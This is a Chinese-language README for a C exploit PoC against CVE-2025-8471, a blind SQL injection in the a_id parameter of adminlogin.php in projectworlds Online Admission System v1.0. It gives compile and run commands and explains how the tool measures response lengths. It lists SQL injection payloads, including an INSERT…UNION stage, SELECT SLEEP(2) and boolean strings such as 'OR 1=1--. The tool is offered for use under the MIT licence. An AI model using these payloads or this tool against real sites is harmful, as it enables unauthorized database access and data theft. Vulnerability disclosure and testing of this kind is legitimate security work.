作者: Byte Reaper
CVE: CVE-2025-8471
漏洞: “projectworlds Online Admission System v1.0”中的SQL注入
描述:
adminlogin.php?a_id=存在盲SQL注入。该PoC发送一系列携带多种载荷的GET请求——包括两阶段载荷(INSERT … UNION SELECT …、SLEEP()、SELECT code …)和“深度注入”字符串——通过响应长度差异来检测和枚举该问题。
确保已安装libcurl和argparse(例如在Debian/Ubuntu上:sudo apt-get install libcurl4-openssl-dev)。
编译:
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u <TARGET_BASE_URL> [-c cookies.txt] [-v]
-u, --url — Base URL of the target, e.g. http://vulnsite.com
-c, --cookies — (Optional) path to a cookies file to maintain session
-v, --verbose — Enable verbose libcurl output and full response dumps
./exploit -u http:// -v
这将执行:
向 /adminlogin.php 发送正常请求并记录其长度。
遍历两阶段和深度载荷列表,将每个载荷注入到 ?a_id=… 处。
将每个注入的响应长度与基准值进行比较。
将每个载荷、HTTP状态码(若≥2xx)以及观察到的长度记录到 result.log 中。
测试的载荷: 两阶段
INSERT INTO stages (id,code) VALUES (3, 'UNION SELECT NULL --');
SELECT SLEEP(2);
SELECT code FROM stages WHERE id = 3;
深度注入
'//OR//1=1--, '//OR//'a'='a'--, …
包括布尔型、时间型、联合查询、子串、排序、LIKE、EXISTS、注释风格注入。
所有载荷在发送前均通过 curl_easy_escape 进行URL编码。
MIT许可证